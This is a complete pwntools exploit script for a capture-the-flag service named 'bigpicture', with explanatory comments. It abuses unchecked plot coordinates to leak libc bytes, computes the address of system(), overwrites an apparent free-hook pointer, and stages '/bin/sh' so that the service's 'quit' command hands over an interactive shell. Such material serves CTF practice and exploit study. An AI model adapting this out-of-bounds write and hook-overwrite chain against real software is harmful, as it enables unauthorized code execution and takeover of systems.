from pwn import *
def pwnit():
    """Exploit driver for the "bigpicture" challenge service.

    Drives the service's plotting protocol in three stages: read libc
    bytes back through the "overwriting <byte>" echo, derive the libc
    base and the address of system() from them, then write that address
    over a libc pointer so that the final "quit" command (which presumably
    frees the canvas buffer) ends up calling system() on the buffer, whose
    first bytes were set to "/bin/sh".

    Side effects: opens a local process or a remote TCP connection and
    leaves it attached to the terminal via r.interactive(). Written for
    Python 2 era pwntools: it concatenates the str returned by recvn() and
    sends str, which would need bytes under Python 3.

    Defender's view: every step relies on the service accepting plot
    coordinates outside the canvas; a bounds check on x and y (and not
    echoing the byte being overwritten) would remove both the read and the
    write primitive used here.
    """
    #h, w = (1024, 1024)
    w, h = (1024, 1024)  # canvas size requested from the service
    #r.sendline(" "+"0"*4096 + "1 , 0 , A")
    #r.recvuntil("> ")
    local = False  # toggle between a local binary and the challenge host
    if local:
        r = process("./bigpicture")
        # All offsets below are specific to one libc build and have no
        # meaning for any other binary.
        # libc_off: distance from the canvas buffer to the start of the
        # libc mapping (negative: libc is mapped below the buffer).
        libc_off = -0x6a9000-0x10
        libc_free_hook = 0x00000000003a77c8  # hook pointer that gets overwritten (name suggests __free_hook)
        libc_init = 0x3a1758 + 8             # libc-resident pointer read for the base leak
        libc_init_const = 0x21860            # offset inside libc that the pointer at libc_init points to
        libc_system = 0x41490                # offset of system()
    else:
        r = remote("bigpicture.chal.pwning.xxx", 420)
        #r = remote("104.155.98.249", 1337)
        libc_off = -0x4e2000 - 0x10
        libc_free_hook = 0x00000000003c57a8  # see the local branch for the meaning of each offset
        libc_init = 0x3bf7d0
        libc_init_const = 0x202c0
        libc_system = 0x45390
    r.sendline("%d x %d" % (w, h))  # choose the canvas dimensions
    r.recvuntil("> ")               # wait for the command prompt

    def send_plot(x,y,byte):
        # One "plot" command: place `byte` at canvas coordinate (x, y).
        # Nothing in this script keeps y inside the 0..h range; the
        # out-of-range values are the whole point.
        r.sendline(" %d , %d , %c" % (x, y, byte))

    def leak_libc(off, size):
        # Read `size` bytes of libc starting at libc offset `off`.
        # Plotting over an existing byte makes the service print
        # "overwriting <old byte>" before replacing it with "\x00", so the
        # old byte is recovered from that echo. With x fixed at 0, y acts
        # as a linear byte offset from the buffer start (the four bytes read
        # at offset 0 come back contiguous as "\x7fELF").
        # NOTE: every leaked byte is also zeroed in the target's memory.
        r.clean(1)  # discard pending output, waiting up to 1 s for it
        data = ""
        for i in range(size):
            send_plot(0, libc_off + off + i, "\x00")
            r.recvuntil("overwriting ")
            data += r.recvn(1)
        return data

    # Stage the argument for the eventual system() call at the start of
    # the canvas buffer.
    for i, c in enumerate("/bin/sh\x00"):
        send_plot(0, i, c)
    # Sanity check of libc_off: the bytes at that offset must be the ELF
    # magic. (assert is stripped under -O; a raise would be sturdier.)
    assert leak_libc(0, 4) == "\x7fELF"
    # Six low bytes of a pointer plus two zero bytes form the u64; subtracting
    # the in-libc offset it points to yields the libc base.
    libc_base = u64(leak_libc(libc_init, 6) + "\x00"*2) - libc_init_const
    libc_system = libc_base + libc_system  # rebase the system() offset
    # Overwrite the hook pointer byte by byte with the address of system().
    for i, c in enumerate(p64(libc_system)):
        send_plot(0, libc_off + libc_free_hook + i, c)
    # "quit" presumably frees the canvas buffer; with the hook replaced that
    # free call runs system() on the "/bin/sh" staged above (inferred from
    # the offset name, not visible here).
    r.sendline("quit")
    r.interactive()
pwnit()  # runs at import time as well: there is no __main__ guard